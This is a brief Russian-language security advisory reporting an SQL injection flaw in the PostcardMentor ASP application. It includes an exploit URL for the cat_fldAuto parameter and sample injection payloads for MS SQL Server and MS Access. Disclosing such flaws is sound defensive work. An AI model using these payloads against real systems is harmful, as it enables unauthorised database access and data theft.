Программа: PostcardMentor

Удаленный нападающий может выполнить произвольные SQL-запросы в базе данных приложения.

Эксплоит:

http://localhost/PostcardMentor/step1.asp?cat_fldAuto={SQL}

MS SQL Server: convert(int,(select+@@version))
 
MS ACCESS: 1 IIF((select%20mid(last(name),1,1)%20from%20(select%20top%20 10%20name%20from%20cat))='a',0,'done')
 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии